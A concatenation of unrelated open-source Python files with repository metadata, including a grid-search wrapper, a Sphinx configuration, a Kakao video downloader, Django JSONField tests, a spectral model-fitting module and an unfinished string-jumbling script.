arg_count = six.get_function_code(train_fn).co_argcount
arg_names = six.get_function_code(train_fn).co_varnames
exp_dir = experiment_utils._get_logdir(app_id, run_id)
max_val, max_hp, min_val, min_hp, avg, max_return_dict, min_return_dict = experiment_utils._get_best(args_dict, num_executions, arg_names, arg_count, exp_dir, optimization_key)
param_combination = ""
best_val = ""
return_dict = {}
if direction.upper() == Direction.MAX:
param_combination = max_hp
best_val = str(max_val)
return_dict = max_return_dict
elif direction.upper() == Direction.MIN:
param_combination = min_hp
best_val = str(min_val)
return_dict = min_return_dict
print('Finished Experiment \n')
best_dir = exp_dir + '/' + param_combination
return best_dir, experiment_utils._get_params_dict(best_dir), best_val, return_dict
def _prepare_func(app_id, run_id, train_fn, args_dict, local_logdir, optimization_key):
"""
Args:
app_id:
run_id:
train_fn:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(train_fn, executor_num, args_dict)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'grid_search', params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
task_start = time.time()
retval = train_fn(*args)
task_end = time.time()
experiment_utils._handle_return(retval, hdfs_exec_logdir, optimization_key, logfile)
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('Returning metric ' + str(retval))
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun | hopshadoop/hops-util-py | hops/experiment_impl/parallel/grid_search.py | Python | apache-2.0 | 4,463 | 0.005602 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# TWX documentation build configuration file, created by
# sphinx-quickstart on Sat Jun 27 15:07:02 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'TWX'
copyright = '2015, Vince Castellano, Phillip Lopo'
author = 'Vince Castellano, Phillip Lopo'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0b3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
html_theme_options = {
'github_user': 'datamachine',
'github_repo': 'twx',
'description': 'Telegram Bot API and MTProto Clients',
'github_banner': True,
'github_button': True,
'show_powered_by': False,
#'link': '#0088cc',
#'sidebar_link': '#0088cc',
#'anchor': '#0088cc',
'gray_1': '#0088cc',
'gray_2': '#ecf3f8',
#'gray_3': '#0088cc',
#'pre_bg': '#ecf3f8',
#'font_family': "'Lucida Grande', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif",
#'head_font_family': "'Lucida Grande', 'Lucida Sans Unicode', Arial, Helvetica, Verdana, sans-serif"
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'TWXdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'TWX.tex', 'TWX Documentation',
'Vince Castellano, Phillip Lopo', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'twx', 'TWX Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'TWX', 'TWX Documentation',
author, 'TWX', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| datamachine/twx | docs/conf.py | Python | mit | 10,106 | 0.006333 |
#!/usr/bin/env python
from ..common import *
from .universal import *
__all__ = ['kakao_download']
def kakao_download(url, output_dir='.', info_only=False, **kwargs):
json_request_url = 'https://videofarm.daum.net/controller/api/closed/v1_2/IntegratedMovieData.json?vid={}'
# in this implementation playlist not supported so use url_without_playlist
# if want to support playlist need to change that
if re.search('playlistId', url):
url = re.search(r"(.+)\?.+?", url).group(1)
page = get_content(url)
try:
vid = re.search(r"<meta name=\"vid\" content=\"(.+)\">", page).group(1)
title = re.search(r"<meta name=\"title\" content=\"(.+)\">", page).group(1)
meta_str = get_content(json_request_url.format(vid))
meta_json = json.loads(meta_str)
standard_preset = meta_json['output_list']['standard_preset']
output_videos = meta_json['output_list']['output_list']
size = ''
if meta_json['svcname'] == 'smr_pip':
for v in output_videos:
if v['preset'] == 'mp4_PIP_SMR_480P':
size = int(v['filesize'])
break
else:
for v in output_videos:
if v['preset'] == standard_preset:
size = int(v['filesize'])
break
video_url = meta_json['location']['url']
print_info(site_info, title, 'mp4', size)
if not info_only:
download_urls([video_url], title, 'mp4', size, output_dir, **kwargs)
except:
universal_download(url, output_dir, merge=kwargs['merge'], info_only=info_only, **kwargs)
site_info = "tv.kakao.com"
download = kakao_download
download_playlist = playlist_not_supported('kakao')
| xyuanmu/you-get | src/you_get/extractors/kakao.py | Python | mit | 1,771 | 0.002823 |
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example downloads activity tags for a given floodlight activity."""
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to download tags for')
argparser.add_argument(
'activity_id', type=int,
help='The ID of the floodlight activity to download tags for')
def main(argv):
# Authenticate and construct service.
service, flags = sample_tools.init(
argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
scope=['https://www.googleapis.com/auth/dfareporting',
'https://www.googleapis.com/auth/dfatrafficking'])
profile_id = flags.profile_id
activity_id = flags.activity_id
try:
# Construct the request.
request = service.floodlightActivities().generatetag(
profileId=profile_id, floodlightActivityId=activity_id)
# Execute request and print response.
response = request.execute()
print response['floodlightActivityTag']
except client.AccessTokenRefreshError:
print ('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
| falbassini/googleads-dfa-reporting-samples | python/v2.0/download_floodlight_tag.py | Python | apache-2.0 | 1,952 | 0.004098 |
from flask import url_for
from tests import ZKWTestCase
from zkw.models import Sourdough, User
class SourdoughDetailsPageTests(ZKWTestCase):
def setUp(self):
super(SourdoughDetailsPageTests, self).setUp()
self.user_1 = User.get_by_email('user_1@example.com')
self.active_sd = Sourdough.query.filter_by(name='Arnulf').first()
self.active_sd_url = url_for('sd.details', sourdough_id=self.active_sd.id)
self.inactive_sd = Sourdough.query.filter_by(name='inactive').first()
self.inactive_sd_url = url_for('sd.details', sourdough_id=self.inactive_sd.id)
def test_anon_inactive_page(self):
"""
Test what anonymous user sees when she tries to access inactive sourdough page.
Expected outcome: HTTP 404
"""
with self.app.test_client() as client:
rv = client.get(self.inactive_sd_url)
self.assert404(rv)
def test_loggedin_inactive_page(self):
"""
Test what logged in user sees when she tries to access inactive sourdough page.
Expected outcome: sourdough details page without form
"""
action_text = 'action="%s"' % self.inactive_sd_url
with self.app.test_client() as client:
self.login(client, self.user_1.email)
rv = client.get(self.inactive_sd_url)
self.assert200(rv)
page = self.page_content(rv)
self.assertNotIn(action_text, page)
def test_owner_inactive_page(self):
"""
Test what owner sees when she tries to access inactive sourdough page.
Expected outcome: sourdough details page with form
"""
action_text = 'action="%s"' % self.inactive_sd_url
with self.app.test_client() as client:
self.login(client, self.inactive_sd.user.email)
rv = client.get(self.inactive_sd_url)
self.assert200(rv)
page = self.page_content(rv)
self.assertIn(action_text, page)
| zgoda/zakwasy | tests/test_sddetails.py | Python | mit | 2,004 | 0.001996 |
import datetime
import uuid
from decimal import Decimal
from django.core import checks, exceptions, serializers
from django.core.serializers.json import DjangoJSONEncoder
from django.forms import CharField, Form, widgets
from django.test.utils import isolate_apps
from django.utils.html import escape
from . import PostgreSQLTestCase
from .models import JSONModel, PostgreSQLModel
try:
from django.contrib.postgres import forms
from django.contrib.postgres.fields import JSONField
except ImportError:
pass
class TestSaveLoad(PostgreSQLTestCase):
def test_null(self):
instance = JSONModel()
instance.save()
loaded = JSONModel.objects.get()
self.assertIsNone(loaded.field)
def test_empty_object(self):
instance = JSONModel(field={})
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, {})
def test_empty_list(self):
instance = JSONModel(field=[])
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, [])
def test_boolean(self):
instance = JSONModel(field=True)
instance.save()
loaded = JSONModel.objects.get()
self.assertIs(loaded.field, True)
def test_string(self):
instance = JSONModel(field='why?')
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, 'why?')
def test_number(self):
instance = JSONModel(field=1)
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, 1)
def test_realistic_object(self):
obj = {
'a': 'b',
'c': 1,
'd': ['e', {'f': 'g'}],
'h': True,
'i': False,
'j': None,
}
instance = JSONModel(field=obj)
instance.save()
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field, obj)
def test_custom_encoding(self):
"""
JSONModel.field_custom has a custom DjangoJSONEncoder.
"""
some_uuid = uuid.uuid4()
obj_before = {
'date': datetime.date(2016, 8, 12),
'datetime': datetime.datetime(2016, 8, 12, 13, 44, 47, 575981),
'decimal': Decimal('10.54'),
'uuid': some_uuid,
}
obj_after = {
'date': '2016-08-12',
'datetime': '2016-08-12T13:44:47.575',
'decimal': '10.54',
'uuid': str(some_uuid),
}
JSONModel.objects.create(field_custom=obj_before)
loaded = JSONModel.objects.get()
self.assertEqual(loaded.field_custom, obj_after)
class TestQuerying(PostgreSQLTestCase):
@classmethod
def setUpTestData(cls):
cls.objs = [
JSONModel.objects.create(field=None),
JSONModel.objects.create(field=True),
JSONModel.objects.create(field=False),
JSONModel.objects.create(field='yes'),
JSONModel.objects.create(field=7),
JSONModel.objects.create(field=[]),
JSONModel.objects.create(field={}),
JSONModel.objects.create(field={
'a': 'b',
'c': 1,
}),
JSONModel.objects.create(field={
'a': 'b',
'c': 1,
'd': ['e', {'f': 'g'}],
'h': True,
'i': False,
'j': None,
'k': {'l': 'm'},
}),
JSONModel.objects.create(field=[1, [2]]),
JSONModel.objects.create(field={
'k': True,
'l': False,
}),
JSONModel.objects.create(field={'foo': 'bar'}),
]
def test_exact(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__exact={}),
[self.objs[6]]
)
def test_exact_complex(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__exact={'a': 'b', 'c': 1}),
[self.objs[7]]
)
def test_isnull(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__isnull=True),
[self.objs[0]]
)
def test_isnull_key(self):
# key__isnull works the same as has_key='key'.
self.assertSequenceEqual(
JSONModel.objects.filter(field__a__isnull=True),
self.objs[:7] + self.objs[9:]
)
self.assertSequenceEqual(
JSONModel.objects.filter(field__a__isnull=False),
[self.objs[7], self.objs[8]]
)
def test_contains(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__contains={'a': 'b'}),
[self.objs[7], self.objs[8]]
)
def test_contained_by(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__contained_by={'a': 'b', 'c': 1, 'h': True}),
[self.objs[6], self.objs[7]]
)
def test_has_key(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_key='a'),
[self.objs[7], self.objs[8]]
)
def test_has_keys(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_keys=['a', 'c', 'h']),
[self.objs[8]]
)
def test_has_any_keys(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__has_any_keys=['c', 'l']),
[self.objs[7], self.objs[8], self.objs[10]]
)
def test_shallow_list_lookup(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__0=1),
[self.objs[9]]
)
def test_shallow_obj_lookup(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__a='b'),
[self.objs[7], self.objs[8]]
)
def test_deep_lookup_objs(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__k__l='m'),
[self.objs[8]]
)
def test_shallow_lookup_obj_target(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__k={'l': 'm'}),
[self.objs[8]]
)
def test_deep_lookup_array(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__1__0=2),
[self.objs[9]]
)
def test_deep_lookup_mixed(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__d__1__f='g'),
[self.objs[8]]
)
def test_deep_lookup_transform(self):
self.assertSequenceEqual(
JSONModel.objects.filter(field__c__gt=1),
[]
)
self.assertSequenceEqual(
JSONModel.objects.filter(field__c__lt=5),
[self.objs[7], self.objs[8]]
)
def test_usage_in_subquery(self):
self.assertSequenceEqual(
JSONModel.objects.filter(id__in=JSONModel.objects.filter(field__c=1)),
self.objs[7:9]
)
def test_iexact(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iexact='BaR').exists())
self.assertFalse(JSONModel.objects.filter(field__foo__iexact='"BaR"').exists())
def test_icontains(self):
self.assertFalse(JSONModel.objects.filter(field__foo__icontains='"bar"').exists())
def test_startswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__startswith='b').exists())
def test_istartswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__istartswith='B').exists())
def test_endswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__endswith='r').exists())
def test_iendswith(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iendswith='R').exists())
def test_regex(self):
self.assertTrue(JSONModel.objects.filter(field__foo__regex=r'^bar$').exists())
def test_iregex(self):
self.assertTrue(JSONModel.objects.filter(field__foo__iregex=r'^bAr$').exists())
@isolate_apps('postgres_tests')
class TestChecks(PostgreSQLTestCase):
def test_invalid_default(self):
class MyModel(PostgreSQLModel):
field = JSONField(default={})
model = MyModel()
self.assertEqual(model.check(), [
checks.Warning(
msg=(
"JSONField default should be a callable instead of an "
"instance so that it's not shared between all field "
"instances."
),
hint='Use a callable instead, e.g., use `dict` instead of `{}`.',
obj=MyModel._meta.get_field('field'),
id='postgres.E003',
)
])
def test_valid_default(self):
class MyModel(PostgreSQLModel):
field = JSONField(default=dict)
model = MyModel()
self.assertEqual(model.check(), [])
def test_valid_default_none(self):
class MyModel(PostgreSQLModel):
field = JSONField(default=None)
model = MyModel()
self.assertEqual(model.check(), [])
class TestSerialization(PostgreSQLTestCase):
test_data = (
'[{"fields": {"field": {"a": "b", "c": null}, "field_custom": null}, '
'"model": "postgres_tests.jsonmodel", "pk": null}]'
)
def test_dumping(self):
instance = JSONModel(field={'a': 'b', 'c': None})
data = serializers.serialize('json', [instance])
self.assertJSONEqual(data, self.test_data)
def test_loading(self):
instance = list(serializers.deserialize('json', self.test_data))[0].object
self.assertEqual(instance.field, {'a': 'b', 'c': None})
class TestValidation(PostgreSQLTestCase):
def test_not_serializable(self):
field = JSONField()
with self.assertRaises(exceptions.ValidationError) as cm:
field.clean(datetime.timedelta(days=1), None)
self.assertEqual(cm.exception.code, 'invalid')
self.assertEqual(cm.exception.message % cm.exception.params, "Value must be valid JSON.")
def test_custom_encoder(self):
with self.assertRaisesMessage(ValueError, "The encoder parameter must be a callable object."):
field = JSONField(encoder=DjangoJSONEncoder())
field = JSONField(encoder=DjangoJSONEncoder)
self.assertEqual(field.clean(datetime.timedelta(days=1), None), datetime.timedelta(days=1))
class TestFormField(PostgreSQLTestCase):
def test_valid(self):
field = forms.JSONField()
value = field.clean('{"a": "b"}')
self.assertEqual(value, {'a': 'b'})
def test_valid_empty(self):
field = forms.JSONField(required=False)
value = field.clean('')
self.assertIsNone(value)
def test_invalid(self):
field = forms.JSONField()
with self.assertRaises(exceptions.ValidationError) as cm:
field.clean('{some badly formed: json}')
self.assertEqual(cm.exception.messages[0], "'{some badly formed: json}' value must be valid JSON.")
def test_formfield(self):
model_field = JSONField()
form_field = model_field.formfield()
self.assertIsInstance(form_field, forms.JSONField)
def test_formfield_disabled(self):
class JsonForm(Form):
name = CharField()
jfield = forms.JSONField(disabled=True)
form = JsonForm({'name': 'xyz', 'jfield': '["bar"]'}, initial={'jfield': ['foo']})
self.assertIn('["foo"]</textarea>', form.as_p())
def test_prepare_value(self):
field = forms.JSONField()
self.assertEqual(field.prepare_value({'a': 'b'}), '{"a": "b"}')
self.assertEqual(field.prepare_value(None), 'null')
self.assertEqual(field.prepare_value('foo'), '"foo"')
def test_redisplay_wrong_input(self):
"""
When displaying a bound form (typically due to invalid input), the form
should not overquote JSONField inputs.
"""
class JsonForm(Form):
name = CharField(max_length=2)
jfield = forms.JSONField()
# JSONField input is fine, name is too long
form = JsonForm({'name': 'xyz', 'jfield': '["foo"]'})
self.assertIn('["foo"]</textarea>', form.as_p())
# This time, the JSONField input is wrong
form = JsonForm({'name': 'xy', 'jfield': '{"foo"}'})
# Appears once in the textarea and once in the error message
self.assertEqual(form.as_p().count(escape('{"foo"}')), 2)
def test_widget(self):
"""The default widget of a JSONField is a Textarea."""
field = forms.JSONField()
self.assertIsInstance(field.widget, widgets.Textarea)
def test_custom_widget_kwarg(self):
"""The widget can be overridden with a kwarg."""
field = forms.JSONField(widget=widgets.Input)
self.assertIsInstance(field.widget, widgets.Input)
def test_custom_widget_attribute(self):
"""The widget can be overridden with an attribute."""
class CustomJSONField(forms.JSONField):
widget = widgets.Input
field = CustomJSONField()
self.assertIsInstance(field.widget, widgets.Input)
def test_already_converted_value(self):
field = forms.JSONField(required=False)
tests = [
'["a", "b", "c"]', '{"a": 1, "b": 2}', '1', '1.5', '"foo"',
'true', 'false', 'null',
]
for json_string in tests:
val = field.clean(json_string)
self.assertEqual(field.clean(val), val)
def test_has_changed(self):
field = forms.JSONField()
self.assertIs(field.has_changed({'a': True}, '{"a": 1}'), True)
self.assertIs(field.has_changed({'a': 1, 'b': 2}, '{"b": 2, "a": 1}'), False)
| uranusjr/django | tests/postgres_tests/test_json.py | Python | bsd-3-clause | 13,888 | 0.001368 |
# -*- coding:utf8 -*-
# File : progress.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 2/26/17
#
# This file is part of TensorArtist.
from tartist.core.utils.thirdparty import get_tqdm_defaults
import tqdm
import numpy as np
def enable_epoch_progress(trainer):
pbar = None
def epoch_progress_on_iter_after(trainer, inp, out):
nonlocal pbar
if pbar is None:
pbar = tqdm.tqdm(total=trainer.epoch_size, leave=False, initial=trainer.iter % trainer.epoch_size,
**get_tqdm_defaults())
desc = 'Iter={}'.format(trainer.iter)
if 'error' in trainer.runtime:
desc += ', error={:.4f}'.format(trainer.runtime['error'])
for k in sorted(out.keys()):
v = out[k]
if isinstance(v, (str, int, float, np.ndarray, np.float32, np.float64, np.int32, np.int64)):
try:
v = float(v)
desc += ', {}={:.4f}'.format(k, v)
except ValueError:
pass
pbar.set_description(desc)
pbar.update()
def epoch_progress_on_epoch_after(trainer):
nonlocal pbar
pbar.close()
pbar = None
trainer.register_event('iter:after', epoch_progress_on_iter_after, priority=25)
trainer.register_event('epoch:after', epoch_progress_on_epoch_after, priority=5)
| vacancy/TensorArtist | tartist/plugins/trainer_enhancer/progress.py | Python | mit | 1,402 | 0.003566 |
from scipy.optimize import curve_fit
from numpy import log, isnan
class NotAModel(Exception):
pass
def chisq(self, result=None):
if result is None:
result = self.result
return ((self.data.cts(row=True)-result)**2/self.data.errors(row=True)**2).sum()
def cstat(self, result):
if result is None:
result = self.result
data = self.data.counts
result = result*self.data.exposure
C = result+data*(log(data)-log(result)-1)
return 2*C[~isnan(C)].sum()
def reduced_chisq(self):
return self.chisq(self.result)/(len(self.data.channels)-len(self.getThawed()))
def append(self, *args):
for model in args:
try:
model._calculate
model.freeze
model.thaw
model.calculate
model.setp
self.models.append(model)
except AttributeError:
raise self.NotAModel(model, model.__class__)
if len(self.models):
self.activate()
def delete(self, index):
# Prevent bad name access
self.models[index] = None
def activate(self, index=-1):
self.current = self.models[index]
self.currentindex = index
def nameModel(self, index, name):
setattr(self, name, lambda: self.activate(index))
def energies(self):
return self.resp.ebinAvg
def tofit(self, elist, *args):
res = self.current.tofit(elist, *args)
return self.resp.convolve_channels(res)
def toMinimize(self, args):
s = self.stat(self.tofit(self.energies(), *args))
return s
def fit(self):
model = self.current
args = self.initArgs()
bestfit, self.errs = curve_fit(self.tofit, self.energies(), self.data.cts(row=True), p0=args,
sigma=self.data.errors(row=True), absolute_sigma=True, epsfcn=self.eps)
self.stderr = dict(zip(model.getThawed(), [self.errs[j][j]**0.5 for j in range(len(self.errs))]))
# ftol = 2.220446049250313e-09
# bestfit = minimize(self.toMinimize,args,method="L-BFGS-B",options={'ftol':ftol})
# if not bestfit.success:
# raise ValueError("-E- Failed fit with: "+bestfit.message.decode('unicode-escape'))
# self.stderr = dict(zip(model.getThawed(),sqrt(abs(max(1,bestfit.fun)*ftol*diag(bestfit.hess_inv.todense())))))
# self.calc(dict(zip(model.getThawed(),bestfit.x)))
self.calc(dict(zip(model.getThawed(), bestfit)))
| uperetz/AstroTools | fitter/_modeling.py | Python | apache-2.0 | 2,367 | 0.00338 |
#!/usr/bin/env python
import sys, argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, action='store', dest='input', default=None, help="Input file")
args = parser.parse_args()
stats = dict()
if args.input is None:
print "Error: No input file"
with open(args.input) as in_file:
for line in in_file.readlines():
time = int(line.split()[0])
tx_bytes = int(line.split()[1])
stats[time] = tx_bytes
stats = sorted(stats.items())
start_time = stats[0][0]
prev_tx = stats[0][1]
no_traffic_flag = True
for time, tx_bytes in stats:
if no_traffic_flag:
if tx_bytes > (prev_tx+100000):
no_traffic_flag = False
start_time, prev_tx = time, tx_bytes
else:
print (time-start_time), (tx_bytes-prev_tx)
prev_tx = tx_bytes
if __name__ == "__main__":
main()
| merlin-lang/kulfi | experiments/testbed/results/plot/sort.py | Python | lgpl-3.0 | 989 | 0.005056 |
"""return a jumbled version of a string. eg, the lazy hamster is jumping becomes the lzay hmasetr si jmunipg
shuffles insides of words.
"""
import random
import string
#okay, so this will be the jmuble algorythim
#variables, passed
#string_to_jumble = "" #yeah
#jumble_mode = true # do u switch words of two letters
def string_jumble(string_to_jumble, jumble_mode = True):
#variables, internal
string_to_return = "" #New string
string_words = [""] #array containing the words of the string
current_word = [] #array containing the letters of the current word
punctuation_ = [] #array containing the punctuation
i = 0
j = 0
#put the words in an array
for char in string_to_jumble:
#each space signifies a new word
if char not in string.ascii_letters:
punctuation_.append(char)
i += 1
##make sure there's something to put it in!
string_words.append("")
else:
#otherwise add to the entry
string_words[i] += char
#print(string_words) THIS IS WORKING
#put the letters of the word into an array, and then switch 'em
for word in string_words:
#if the word is two long and mode is true switch 'em
if (len(word) >= 0) and (len(word) <= 3) :
if jumble_mode == True:
#
for char in word:
current_word.append(str(char))
#print(current_word)
random.shuffle(current_word)
#pop the word and a space into the return string
for char in current_word:
string_to_return += char
string_to_return += punctuation_[string_words.index(word)]
#print(string_to_return)
current_word.clear()
#that's all for this word
continue
#ok now for the REAL real deal
#take away the first letter and put it in string_to_return bc it souldn't be jumbled
i = 0
for char in word:
if i == 0:
string_to_return += char
#print(string_to_return)
i = 1
#assert bluh WORKING
continue
#then put almost all of the word in current_word[]
#current_word.append("")
if (i+1) < len(word):
current_word.append(str(char))
#print(current_word)
i +=1
#we should be at the last character now
#print(i)
print(len(word)+100)
#jumble it
#random.shuffle(current_word)
#add to the new string
for char in current_word:
